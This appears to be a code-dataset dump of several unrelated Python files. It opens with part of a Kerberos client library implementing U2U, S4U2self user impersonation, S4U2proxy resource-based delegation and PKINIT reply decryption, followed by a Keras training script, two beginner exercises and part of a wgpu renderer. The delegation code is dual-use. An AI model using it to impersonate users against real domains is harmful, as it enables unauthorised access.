self.credential.get_preferred_enctype(supp_enc_methods)\n\t\tnow = datetime.datetime.now(datetime.timezone.utc)\n\t\tauthenticator_data = {}\n\t\tauthenticator_data['authenticator-vno'] = krb5_pvno\n\t\tauthenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])\n\t\tauthenticator_data['cname'] = self.kerberos_TGT['cname']\n\t\tauthenticator_data['cusec'] = now.microsecond\n\t\tauthenticator_data['ctime'] = now.replace(microsecond=0)\n\n\n\t\tauthenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)\n\n\t\tap_req = {}\n\t\tap_req['pvno'] = krb5_pvno\n\t\tap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value\n\t\tap_req['ap-options'] = APOptions(set())\n\t\tap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])\n\t\tap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})\n\n\t\tpa_data_auth = {}\n\t\tpa_data_auth['padata-type'] = PaDataType.TGS_REQ.value\n\t\tpa_data_auth['padata-value'] = AP_REQ(ap_req).dump()\n\n\t\t\n\t\tkrb_tgs_body = {}\n\t\tkrb_tgs_body['kdc-options'] = KDCOptions(set(kdcopts))\n\t\tkrb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': self.credential.username.split('/')})\n\t\tkrb_tgs_body['realm'] = self.credential.domain.upper()\n\t\tkrb_tgs_body['till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkrb_tgs_body['nonce'] = secrets.randbits(31)\n\t\tkrb_tgs_body['etype'] = [23] # dunno why it must be 23?\n\t\tkrb_tgs_body['additional-tickets'] = [Ticket(self.kerberos_TGT['ticket'])]\n\t\t\n\t\t\n\t\tkrb_tgs_req = {}\n\t\tkrb_tgs_req['pvno'] = krb5_pvno\n\t\tkrb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value\n\t\tkrb_tgs_req['padata'] = [pa_data_auth] #pa_for_user\n\t\tkrb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)\n\t\t\n\t\t\n\t\t\n\t\treq = TGS_REQ(krb_tgs_req)\n\t\tlogger.debug('[U2U] Sending request to server')\n\t\t\n\t\treply = self.ksoc.sendrecv(req.dump())\n\t\tif reply.name == 'KRB_ERROR':\n\t\t\temsg = '[U2U] failed!'\n\t\t\tif reply.native['error-code'] == 16:\n\t\t\t\temsg = '[U2U] Failed to get U2U! Error code (16) indicates that delegation is not enabled for this account!'\t\t\t\n\t\t\traise KerberosError(reply, emsg)\n\t\t\n\t\tlogger.debug('[U2U] Got reply, decrypting...')\n\t\ttgs = reply.native\n\n\t\tcipher = _enctype_table[int(tgs['ticket']['enc-part']['etype'])]\n\t\tencticket = tgs['ticket']['enc-part']['cipher']\n\t\tdecdata = cipher.decrypt(self.kerberos_session_key, 2, encticket)\n\t\tdecticket = EncTicketPart.load(decdata).native\n\n\t\tencTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native\n\t\tkey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])\n\t\tself.ccache.add_tgs(tgs, encTGSRepPart)\n\t\tlogger.debug('[U2U] Got valid TGS reply')\n\n\t\treturn tgs, encTGSRepPart, key, decticket\n\n\t\n\t#https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/6a8dfc0c-2d32-478a-929f-5f9b1b18a169\n\tdef S4U2self(self, user_to_impersonate, spn_user = None, kdcopts = ['forwardable','renewable','canonicalize'], supp_enc_methods = [EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):\n\t\t\"\"\"\n\t\tuser_to_impersonate : KerberosTarget class\n\t\t\"\"\"\t\t\n\t\tif not self.kerberos_TGT:\n\t\t\tlogger.debug('[S4U2self] TGT is not available! Fetching TGT...')\n\t\t\tself.get_TGT()\n\t\t\n\t\tsupp_enc = self.credential.get_preferred_enctype(supp_enc_methods)\n\t\tauth_package_name = 'Kerberos'\n\t\tnow = datetime.datetime.now(datetime.timezone.utc)\n\t\t\n\t\t\n\t\t###### Calculating authenticator data\n\t\tauthenticator_data = {}\n\t\tauthenticator_data['authenticator-vno'] = krb5_pvno\n\t\tauthenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])\n\t\tauthenticator_data['cname'] = self.kerberos_TGT['cname']\n\t\tauthenticator_data['cusec'] = now.microsecond\n\t\tauthenticator_data['ctime'] = now.replace(microsecond=0)\n\t\t\n\t\tauthenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)\n\t\t\n\t\tap_req = {}\n\t\tap_req['pvno'] = krb5_pvno\n\t\tap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value\n\t\tap_req['ap-options'] = APOptions(set())\n\t\tap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])\n\t\tap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})\n\t\t\n\t\t\n\t\tpa_data_auth = {}\n\t\tpa_data_auth['padata-type'] = PaDataType.TGS_REQ.value\n\t\tpa_data_auth['padata-value'] = AP_REQ(ap_req).dump()\n\t\t\n\t\t###### Calculating checksum data\n\t\t\n\t\tS4UByteArray = NAME_TYPE.PRINCIPAL.value.to_bytes(4, 'little', signed = False)\n\t\tS4UByteArray += user_to_impersonate.username.encode()\n\t\tS4UByteArray += user_to_impersonate.domain.encode()\n\t\tS4UByteArray += auth_package_name.encode()\n\t\tlogger.debug('[S4U2self] S4UByteArray: %s' % S4UByteArray.hex())\n\t\tlogger.debug('[S4U2self] S4UByteArray: %s' % S4UByteArray)\n\t\t\n\t\tchksum_data = _HMACMD5.checksum(self.kerberos_session_key, 17, S4UByteArray)\n\t\tlogger.debug('[S4U2self] chksum_data: %s' % chksum_data.hex())\n\t\t\n\t\t\n\t\tchksum = {}\n\t\tchksum['cksumtype'] = int(CKSUMTYPE('HMAC_MD5'))\n\t\tchksum['checksum'] = chksum_data\n\n\t\t\n\t\t###### Filling out PA-FOR-USER data for impersonation\n\t\tpa_for_user_enc = {}\n\t\tpa_for_user_enc['userName'] = PrincipalName({'name-type': NAME_TYPE.PRINCIPAL.value, 'name-string': user_to_impersonate.get_principalname()})\n\t\tpa_for_user_enc['userRealm'] = user_to_impersonate.domain\n\t\tpa_for_user_enc['cksum'] = Checksum(chksum)\n\t\tpa_for_user_enc['auth-package'] = auth_package_name\n\t\t\n\t\tpa_for_user = {}\n\t\tpa_for_user['padata-type'] = int(PADATA_TYPE('PA-FOR-USER'))\n\t\tpa_for_user['padata-value'] = PA_FOR_USER_ENC(pa_for_user_enc).dump()\n\t\n\t\t###### Constructing body\n\t\tif spn_user is not None:\n\t\t\tif isinstance(spn_user, str):\n\t\t\t\tspn_user = [spn_user]\n\t\t\telif isinstance(spn_user, list):\n\t\t\t\tspn_user = spn_user\n\t\t\telse:\n\t\t\t\tspn_user = spn_user.get_principalname()\n\t\telse:\n\t\t\tspn_user = self.credential.username.split('/')\n\n\t\t\n\t\tkrb_tgs_body = {}\n\t\tkrb_tgs_body['kdc-options'] = KDCOptions(set(kdcopts))\n\t\tkrb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.UNKNOWN.value, 'name-string': spn_user})\n\t\tkrb_tgs_body['realm'] = self.credential.domain.upper()\n\t\tkrb_tgs_body['till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkrb_tgs_body['nonce'] = secrets.randbits(31)\n\t\tkrb_tgs_body['etype'] = [self.kerberos_session_key.enctype] #[supp_enc.value] #selecting according to server's preferences\n\t\t\n\t\t\n\t\tkrb_tgs_req = {}\n\t\tkrb_tgs_req['pvno'] = krb5_pvno\n\t\tkrb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value\n\t\tkrb_tgs_req['padata'] = [pa_data_auth, pa_for_user]\n\t\tkrb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)\n\t\t\n\t\treq = TGS_REQ(krb_tgs_req)\n\t\t\n\t\tlogger.debug('[S4U2self] Sending request to server')\n\t\t\n\t\treply = self.ksoc.sendrecv(req.dump())\n\t\tif reply.name == 'KRB_ERROR':\n\t\t\temsg = 'S4U2self failed!'\n\t\t\tif reply.native['error-code'] == 16:\n\t\t\t\temsg = 'S4U2self: Failed to get S4U2self! Error code (16) indicates that delegation is not enabled for this account!'\t\t\t\n\t\t\traise KerberosError(reply, emsg)\n\t\t\n\t\tlogger.debug('[S4U2self] Got reply, decrypting...')\n\t\ttgs = reply.native\n\t\t\n\t\tencTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native\n\t\tkey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])\n\t\t\n\t\tself.ccache.add_tgs(tgs, encTGSRepPart)\n\t\tlogger.debug('[S4U2self] Got valid TGS reply')\n\t\tself.kerberos_TGS = tgs\n\t\treturn tgs, encTGSRepPart, key\n\t\t\t\t\n\t# https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-sfu/c920c148-8a9c-42e9-b8e9-db5755cd281b\n\tdef S4U2proxy(self, s4uself_ticket, spn_user, supp_enc_methods = [EncryptionType.ARCFOUR_HMAC_MD5,EncryptionType.AES256_CTS_HMAC_SHA1_96,EncryptionType.AES128_CTS_HMAC_SHA1_96]):\n\t\tlogger.debug('[S4U2proxy] Impersonating %s' % '/'.join(spn_user.get_principalname()))\n\t\tnow = datetime.datetime.now(datetime.timezone.utc)\n\t\tsupp_enc = self.credential.get_preferred_enctype(supp_enc_methods)\n\t\t\n\t\tpa_pac_opts = {}\n\t\tpa_pac_opts['padata-type'] = int(PADATA_TYPE('PA-PAC-OPTIONS'))\n\t\tpa_pac_opts['padata-value'] = PA_PAC_OPTIONS({'value' : PA_PAC_OPTIONSTypes(set(['resource-based constrained delegation']))}).dump()\n\n\t\t\n\t\tauthenticator_data = {}\n\t\tauthenticator_data['authenticator-vno'] = krb5_pvno\n\t\tauthenticator_data['crealm'] = Realm(self.kerberos_TGT['crealm'])\n\t\tauthenticator_data['cname'] = self.kerberos_TGT['cname']\n\t\tauthenticator_data['cusec'] = now.microsecond\n\t\tauthenticator_data['ctime'] = now.replace(microsecond=0)\n\t\t\n\t\tauthenticator_data_enc = self.kerberos_cipher.encrypt(self.kerberos_session_key, 7, Authenticator(authenticator_data).dump(), None)\n\t\t\n\t\tap_req = {}\n\t\tap_req['pvno'] = krb5_pvno\n\t\tap_req['msg-type'] = MESSAGE_TYPE.KRB_AP_REQ.value\n\t\tap_req['ap-options'] = APOptions(set())\n\t\tap_req['ticket'] = Ticket(self.kerberos_TGT['ticket'])\n\t\tap_req['authenticator'] = EncryptedData({'etype': self.kerberos_cipher_type, 'cipher': authenticator_data_enc})\n\t\t\n\t\tpa_tgs_req = {}\n\t\tpa_tgs_req['padata-type'] = PaDataType.TGS_REQ.value\n\t\tpa_tgs_req['padata-value'] = AP_REQ(ap_req).dump()\n\t\t\n\t\t\n\t\tkrb_tgs_body = {}\n\t\t#krb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','forwarded','renewable','renewable-ok', 'canonicalize']))\n\t\tkrb_tgs_body['kdc-options'] = KDCOptions(set(['forwardable','renewable','constrained-delegation', 'canonicalize']))\n\t\tkrb_tgs_body['sname'] = PrincipalName({'name-type': NAME_TYPE.SRV_INST.value, 'name-string': spn_user.get_principalname()})\n\t\tkrb_tgs_body['realm'] = self.credential.domain.upper()\n\t\tkrb_tgs_body['till'] = (now + datetime.timedelta(days=1)).replace(microsecond=0)\n\t\tkrb_tgs_body['nonce'] = secrets.randbits(31)\n\t\tkrb_tgs_body['etype'] = [self.kerberos_session_key.enctype] #[supp_enc.value] #selecting according to server's preferences\n\t\tkrb_tgs_body['additional-tickets'] = [s4uself_ticket]\n\t\t\n\t\t\n\t\tkrb_tgs_req = {}\n\t\tkrb_tgs_req['pvno'] = krb5_pvno\n\t\tkrb_tgs_req['msg-type'] = MESSAGE_TYPE.KRB_TGS_REQ.value\n\t\tkrb_tgs_req['padata'] = [pa_tgs_req, pa_pac_opts]\n\t\tkrb_tgs_req['req-body'] = KDC_REQ_BODY(krb_tgs_body)\n\t\t\n\t\treq = TGS_REQ(krb_tgs_req)\n\t\t\n\t\treply = self.ksoc.sendrecv(req.dump())\n\t\tif reply.name == 'KRB_ERROR':\n\t\t\temsg = 'S4U2proxy failed!'\n\t\t\tif reply.native['error-code'] == 16:\n\t\t\t\temsg = 'S4U2proxy: Failed to get S4U2proxy! Error code (16) indicates that delegation is not enabled for this account!'\n\t\t\t\n\t\t\traise KerberosError(reply, emsg)\n\t\t\n\t\tlogger.debug('[S4U2proxy] Got server reply, decrypting...')\n\t\ttgs = reply.native\n\t\t\n\t\tencTGSRepPart = EncTGSRepPart.load(self.kerberos_cipher.decrypt(self.kerberos_session_key, 8, tgs['enc-part']['cipher'])).native\n\t\tkey = Key(encTGSRepPart['key']['keytype'], encTGSRepPart['key']['keyvalue'])\n\t\t\n\t\tself.ccache.add_tgs(tgs, encTGSRepPart)\n\t\tlogger.debug('[S4U2proxy] Got valid TGS reply')\n\n\t\treturn tgs, encTGSRepPart, key\n\t\t\n\n\tdef construct_apreq(self, tgs, encTGSRepPart, sessionkey, flags = None, seq_number = 0, ap_opts = [], cb_data = None):\n\t\treturn construct_apreq_from_tgs_tgt(\n\t\t\ttgs, \n\t\t\tsessionkey, \n\t\t\tself.kerberos_TGT, \n\t\t\tflags = flags, \n\t\t\tseq_number = seq_number, \n\t\t\tap_opts = ap_opts, \n\t\t\tcb_data = cb_data\n\t\t)\n\n\tdef getST(self, target_user, service_spn):\n\t\ttgs, encTGSRepPart, key = self.S4U2self(target_user)\n\t\treturn self.S4U2proxy(tgs['ticket'], service_spn)\n\n\tdef decrypt_asrep_cert(self, as_rep):\n\t\t\n\t\tdef truncate_key(value, keysize):\n\t\t\toutput = b''\n\t\t\tcurrentNum = 0\n\t\t\twhile len(output) < keysize:\n\t\t\t\tcurrentDigest = hashlib.sha1(bytes([currentNum]) + value).digest()\n\t\t\t\tif len(output) + len(currentDigest) > keysize:\n\t\t\t\t\toutput += currentDigest[:keysize - len(output)]\n\t\t\t\t\tbreak\n\t\t\t\toutput += currentDigest\n\t\t\t\tcurrentNum += 1\n\t\t\t\n\t\t\treturn output\n\n\t\tfor pa in as_rep['padata']:\n\t\t\tif pa['padata-type'] == 17:\n\t\t\t\tpkasrep = PA_PK_AS_REP.load(pa['padata-value']).native\n\t\t\t\tbreak\n\t\telse:\n\t\t\traise Exception('PA_PK_AS_REP not found!')\n\n\t\ttry:\n\t\t\tsd = cms.SignedData.load(pkasrep['dhSignedData']).native\n\t\texcept:\n\t\t\tsd = cms.SignedData.load(pkasrep['dhSignedData'][19:]).native # !!!!!!!!!!!!! TODO: CHECKTHIS!!! Sometimes there is an OID before the struct?!\n\t\n\t\tkeyinfo = sd['encap_content_info']\n\t\tif keyinfo['content_type'] != '1.3.6.1.5.2.3.2':\n\t\t\traise Exception('Keyinfo content type unexpected value')\n\t\tauthdata = KDCDHKeyInfo.load(keyinfo['content']).native\n\t\tpubkey = int(''.join(['1'] + [str(x) for x in authdata['subjectPublicKey']]), 2)\t\t\n\n\t\tpubkey = int.from_bytes(core.BitString(authdata['subjectPublicKey']).dump()[7:], 'big', signed = False) # !!!!!!!!!!!!! TODO: CHECKTHIS!!!\n\t\tshared_key = self.credential.dhparams.exchange(pubkey)\n\t\t\n\t\tserver_nonce = pkasrep['serverDHNonce']\n\t\tfullKey = shared_key + self.credential.dhparams.dh_nonce + server_nonce\n\n\t\tetype = as_rep['enc-part']['etype']\n\t\tcipher = _enctype_table[etype]\n\t\tif etype == Enctype.AES256:\n\t\t\tself.pkinit_tkey = truncate_key(fullKey, 32)\n\t\telif etype == Enctype.AES128:\n\t\t\tself.pkinit_tkey = truncate_key(fullKey, 16)\n\t\telif etype == Enctype.RC4:\n\t\t\traise NotImplementedError('RC4 key truncation documentation missing. it is different from AES')\n\t\t\t#self.pkinit_tkey = truncate_key(fullKey, 16)\n\t\t\n\n\t\tkey = Key(cipher.enctype, self.pkinit_tkey)\n\t\tenc_data = as_rep['enc-part']['cipher']\n\t\tdec_data = cipher.decrypt(key, 3, enc_data)\n\t\tencasrep = EncASRepPart.load(dec_data).native\n\t\tcipher = _enctype_table[ int(encasrep['key']['keytype'])]\n\t\tsession_key = Key(cipher.enctype, encasrep['key']['keyvalue'])\n\t\treturn encasrep, session_key, cipher\n\n\n\t","sub_path":"minikerberos/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":32290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"329204630","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport pandas as pd\nimport numpy as np\nfrom collections import defaultdict \nimport sys\nimport os\nimport matplotlib.pyplot as plt\nfrom tabulate import tabulate\nimport time\nimport keras \nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Input, Dropout, Embedding, LSTM, Flatten, Lambda\nfrom sklearn.preprocessing import OneHotEncoder, MinMaxScaler\nfrom keras.preprocessing.text import Tokenizer\n\nfrom keras.utils import to_categorical\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping\nfrom sklearn import preprocessing\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.cross_validation import train_test_split\nfrom keras.utils.vis_utils import plot_model\n\n\n# In[5]:\n\n\nADDR = '/nfs_home/nbhardwaj/data/rds_final/'\nw_ADDR = '/nfs_home/nbhardwaj/model_weights/finalwts/'\n\n\n# In[6]:\n\n\nfrom sklearn.preprocessing import LabelEncoder\n\nclass LabelEncoderExt(object):\n def __init__(self):\n \"\"\"\n It differs from LabelEncoder by handling new classes and providing a value for it [Unknown]\n Unknown will be added in fit and transform will take care of new item. It gives unknown class id\n \"\"\"\n self.label_encoder = LabelEncoder()\n # self.classes_ = self.label_encoder.classes_\n\n def fit(self, data_list):\n \"\"\"\n This will fit the encoder for all the unique values and introduce unknown value\n :param data_list: A list of string\n :return: self\n \"\"\"\n self.label_encoder = self.label_encoder.fit(list(data_list) + ['Unknown'])\n self.classes_ = self.label_encoder.classes_\n\n return self\n\n def transform(self, data_list):\n \"\"\"\n This will transform the data_list to id list where the new values get assigned to Unknown class\n :param data_list:\n :return:\n \"\"\"\n new_data_list = list(data_list)\n m = {}\n for x in self.label_encoder.classes_:\n m[x] = True\n for ind, y in enumerate(new_data_list):\n if(m.get(y) is None):\n new_data_list[ind] = 'Unknown'\n# for unique_item in np.unique(data_list):\n# if unique_item not in self.label_encoder.classes_:\n# new_data_list = ['Unknown' if x==unique_item else x for x in new_data_list]\n return self.label_encoder.transform(new_data_list)\n \n\n\n# In[ ]:\n\n\ndef create_model(embed_size = 10):\n inp1 = Input(shape = (1,))\n inp2 = Input(shape = (1,))\n inp3 = Input(shape = (1,))\n\n embed1 = Embedding(len(le_inst.classes_), embed_size, input_length = 1)(inp1)\n embed2 = Embedding(len(le_delta.classes_), embed_size, input_length = 1)(inp2)\n\n merged_inp = keras.layers.concatenate([embed1, embed2], axis = 1)\n merged_inp = Flatten()(merged_inp)\n merged_inp = keras.layers.concatenate([merged_inp, inp3])\n \n# out = LSTM(64)(merged_inp)\n out = Dense(32, activation = 'relu')(merged_inp)\n out = Dense(8, activation = 'softmax')(out)\n\n model = Model([inp1, inp2, inp3], out)\n return model\n\n\n# In[ ]:\n\n\n# sets = [x for x in range(18, 64)]\nsets = [51]\ninst_vocab = []\ndelta_vocab = []\ntrain_acc = []\ntest_acc = []\nlens = []\n# print(\"enter file name -_--------------------------->\")\n# fname = input()\n# fname = str(fname)\nfname = '648'\n#make dir for saving model weights\nw_ADDR = w_ADDR + str(fname)\nif(not os.path.isdir(w_ADDR)):\n if(os.system('mkdir '+ w_ADDR) != 0):\n print(\"error creating dir \"+fname)\n exit()\nfor cset in sets:\n start = time.time()\n df = pd.read_csv(ADDR+fname+'_'+str(cset)+'.csv', index_col = [0], usecols = [0, 2, 4, 7, 8], nrows = 100000000)\n df.Mode = np.where(df.Mode.values=='R', 1, -1)\n df.Mode = df['Mode'].astype('str')\n df.Instruction = df.Instruction.astype('str')\n df.delta = df.delta.astype('float')\n \n X = df[['Instruction', 'delta', 'Mode']].values[1:]\n y = df[['label']].values[1:]\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.40, random_state = 42)\n print(\"--------------------split done---------------------\")\n le_inst = LabelEncoderExt()\n le_inst.fit(X_train[:, 0])\n le_delta = LabelEncoderExt()\n le_delta.fit(X_train[:, 1])\n print(\"----------------labels done----------------------\")\n X_train[:, 0] = le_inst.transform(X_train[:, 0])\n X_train[:, 1] = le_delta.transform(X_train[:, 1])\n print(\"--------\")\n \n X_test[:, 0] = le_inst.transform(X_test[:, 0])\n X_test[:, 1] = le_delta.transform(X_test[:, 1])\n print(\"-------------------labels transformed---------------------\")\n model = create_model()\n model.compile(optimizer = 'adam', loss = 'categorical_crossentropy', metrics = ['accuracy'])\n es = EarlyStopping(monitor = 'val_loss', mode = 'min', verbose = 1, patience = 2)\n filepath = w_ADDR+'/'+str(cset)+'.hdf5'\n mc = ModelCheckpoint(filepath, monitor = 'val_accuracy', save_best_only = True, mode = 'max')\n history = model.fit([X_train[:, 0], X_train[:, 1], X_train[:, 2]], to_categorical(y_train), epochs = 50, \n validation_split = 0.2, use_multiprocessing = True, verbose = 2, callbacks = [es, mc])\n print(\"------------training done------------\")\n t_ac = model.evaluate([X_test[:, 0], X_test[:, 1], X_test[:, 2]], to_categorical(y_test))[1]\n test_acc.append(t_ac)\n tr_ac = model.evaluate([X_train[:, 0], X_train[:, 1], X_train[:, 2]], to_categorical(y_train))[1]\n train_acc.append(tr_ac)\n inst_vocab.append(len(le_inst.classes_))\n delta_vocab.append(len(le_delta.classes_))\n end = time.time()\n print(\"--------------done processing for set---------->\", cset, \"|| time->\", end-start, \"s\")\n print(\"train acc-->\", tr_ac)\n print(\"test acc--->\", t_ac)\ndf2 = pd.DataFrame(list(zip(train_acc, test_acc, lens)), columns = ['train_accuracy', 'test_accuracy','length'])\ndf2.to_csv(w_ADDR+'/acc.csv')\n\n\n# In[34]:\n\n\n# history.history.keys()\n\n\n# In[35]:\n\n\n# plt.plot(history.history['loss'], label = 'train')\n# plt.plot(history.history['val_loss'] , label = 'validation')\n# plt.legend()\n# plt.xlabel('epochs')\n# plt.ylabel('loss')\n# plt.show()\n\n\n# In[ ]:\n\n\n# how to load the stored model\n\n# from keras.models import load_model\n# saved_model = load_model(filepath)\n# tr_ac = model.evaluate([X_train[:, 0], X_train[:, 1], X_train[:, 2]], to_categorical(y_train))[1]\n# print(\"train acc--->\", tr_ac)\n\n","sub_path":"RD_Embedding- basic.py","file_name":"RD_Embedding- basic.py","file_ext":"py","file_size_in_byte":6394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"594694932","text":"'''\n4-4. 백만\n1부터 백만까지 숫자 리스트를 만���고 for 루프를 써서 숫자를 출력하세요 (출력이 너무 오래 걸리면 Ctrl-c를 누르거나 그냥 출력 창을 닫아도 됩니다).\n\nOutput:\n1\n2\n...\n999999\n1000000\n'''\n\nnumbers = list(range(1, 1000001))\n\nfor number in numbers:\n print(number)\n\n","sub_path":"solutions/ch4/4_4_b.py","file_name":"4_4_b.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"1434350","text":"# Filename: ProgrammingExercise11.py\r\n# Author: N. Anim\r\n# Date: Feb. 22, 2016\r\n# Purpose: To solve the programming exercise 11 on page 170\r\n# in the text. It is to determine the number of minutes,\r\n# hours, and days in the given number of seconds.\r\n\r\n# Constants\r\nSECONDSPERMINUTE = 60\r\nSECONDSPERHOUR = 3600\r\nSECONDSPERDAY = 86400\r\n\r\n# Prompt for and read the number of seconds\r\nseconds = int(input('Enter a integer for seconds: '))\r\n\r\n# Display the number of minutes in that many seconds\r\nif (seconds >= SECONDSPERMINUTE):\r\n minutes = seconds / SECONDSPERMINUTE\r\n print('There are %.2f minutes in %d seconds.'% (minutes, seconds))\r\n\r\n# Display the number of hours in that many seconds\r\nif (seconds >= SECONDSPERHOUR):\r\n hours = seconds / SECONDSPERHOUR\r\n print('There are %.2f hours in %d seconds.'% (hours, seconds))\r\n\r\n# Display the number of days in that many seconds\r\nif (seconds >= SECONDSPERDAY):\r\n days = seconds / SECONDSPERDAY\r\n print('There are %.2f days in %d seconds.'% (days, seconds))\r\n","sub_path":"Programs/ProgrammingExercise11.py","file_name":"ProgrammingExercise11.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"626000482","text":"import python_shader # noqa\nfrom python_shader import Struct, vec2, mat4\nimport wgpu.backends.rs\n\nfrom .. import Renderer, RenderFunctionRegistry\nfrom ...objects import WorldObject\nfrom ...cameras import Camera\nfrom ...linalg import Matrix4, Vector3\nfrom ...datawrappers import BaseBuffer, Buffer, TextureView\nfrom ...utils import array_from_shadertype\n\n\n# Definition uniform struct with standard info related to transforms,\n# provided to each shader as uniform at slot 0.\nstdinfo_uniform_type = Struct(\n world_transform=mat4,\n cam_transform=mat4,\n projection_transform=mat4,\n physical_size=vec2,\n logical_size=vec2,\n)\n\n\nregistry = RenderFunctionRegistry()\n\nvisibility_all = (\n wgpu.ShaderStage.VERTEX | wgpu.ShaderStage.FRAGMENT | wgpu.ShaderStage.COMPUTE\n)\n\n\ndef register_wgpu_render_function(wobject_cls, material_cls):\n \"\"\" Decorator to register a WGPU render function.\n \"\"\"\n\n def _register_wgpu_renderer(f):\n registry.register(wobject_cls, material_cls, f)\n return f\n\n return _register_wgpu_renderer\n\n\nclass RenderInfo:\n \"\"\" The type of object passed to each wgpu render function together\n with the world object. Contains stdinfo buffer for now. In time\n will probably also include lights etc.\n \"\"\"\n\n def __init__(self, *, stdinfo):\n self.stdinfo = stdinfo\n\n\nclass WgpuRenderer(Renderer):\n \"\"\" A renderer that renders to a surface.\n \"\"\"\n\n def __init__(self, canvas):\n self._canvas = canvas\n\n self._pipelines = []\n\n self._adapter = wgpu.request_adapter(\n canvas=canvas, power_preference=\"high-performance\"\n )\n self._device = self._adapter.request_device(extensions=[], limits={})\n\n self._swap_chain = self._device.configure_swap_chain(\n canvas, wgpu.TextureFormat.bgra8unorm_srgb,\n )\n self._depth_texture_size = (0, 0)\n\n def render(self, scene: WorldObject, camera: Camera):\n \"\"\" Main render method, called from the canvas.\n \"\"\"\n\n # todo: support for alt render pipelines (object that renders to texture then renders that)\n # todo: also note that the fragment shader is (should be) optional\n # (e.g. depth only passes like shadow mapping or z prepass)\n\n device = self._device\n physical_size = self._canvas.get_physical_size() # 2 ints\n logical_size = self._canvas.get_logical_size() # 2 floats\n # pixelratio = self._canvas.get_pixel_ratio()\n\n # Ensure that matrices are up-to-date\n scene.update_matrix_world()\n camera.update_matrix_world() # camera may not be a member of the scene\n camera.update_projection_matrix()\n\n # Get the sorted list of objects to render (guaranteed to be visible and having a material)\n proj_screen_matrix = Matrix4().multiply_matrices(\n camera.projection_matrix, camera.matrix_world_inverse\n )\n q = self.get_render_list(scene, proj_screen_matrix)\n\n # Ensure each wobject has pipeline info\n for wobject in q:\n self._make_up_to_date(wobject)\n\n # Filter out objects that we cannot render\n q = [wobject for wobject in q if wobject._wgpu_data is not None]\n\n # Prepate depth texture\n if self._depth_texture_size != physical_size:\n self._depth_texture_size = physical_size\n self._depth_texture = device.create_texture(\n size=(physical_size[0], physical_size[1], 1),\n usage=wgpu.TextureUsage.OUTPUT_ATTACHMENT,\n dimension=\"2d\",\n format=wgpu.TextureFormat.depth32float,\n )\n self._depth_texture_view = self._depth_texture.create_view()\n self._depth_texture.destroy()\n\n # Prepare for rendering\n command_encoder = device.create_command_encoder()\n command_buffers = []\n\n # Update stdinfo buffer for all objects\n # todo: a lot of duplicate data here. Let's revisit when we implement point / line collections.\n for wobject in q:\n wgpu_data = wobject._wgpu_data\n stdinfo = wgpu_data[\"stdinfo\"]\n stdinfo.data[\"world_transform\"] = tuple(wobject.matrix_world.elements)\n stdinfo.data[\"cam_transform\"] = tuple(camera.matrix_world_inverse.elements)\n stdinfo.data[\"projection_transform\"] = tuple(\n camera.projection_matrix.elements\n )\n stdinfo.data[\"physical_size\"] = physical_size\n stdinfo.data[\"logical_size\"] = logical_size\n stdinfo.update_range(0, 1)\n self._update_buffer(stdinfo)\n\n # ----- compute pipelines\n\n compute_pass = command_encoder.begin_compute_pass()\n\n for wobject in q:\n wgpu_data = wobject._wgpu_data\n for pinfo in wgpu_data[\"compute_pipelines\"]:\n compute_pass.set_pipeline(pinfo[\"pipeline\"])\n for bind_group_id, bind_group in enumerate(pinfo[\"bind_groups\"]):\n compute_pass.set_bind_group(\n bind_group_id, bind_group, [], 0, 999999\n )\n compute_pass.dispatch(*pinfo[\"index_args\"])\n\n compute_pass.end_pass()\n\n # ----- render pipelines rendering to the default target\n\n with self._swap_chain as texture_view_target:\n\n render_pass = command_encoder.begin_render_pass(\n color_attachments=[\n {\n \"attachment\": texture_view_target,\n \"resolve_target\": None,\n \"load_value\": (0, 0, 0, 0), # LoadOp.load or color\n \"store_op\": 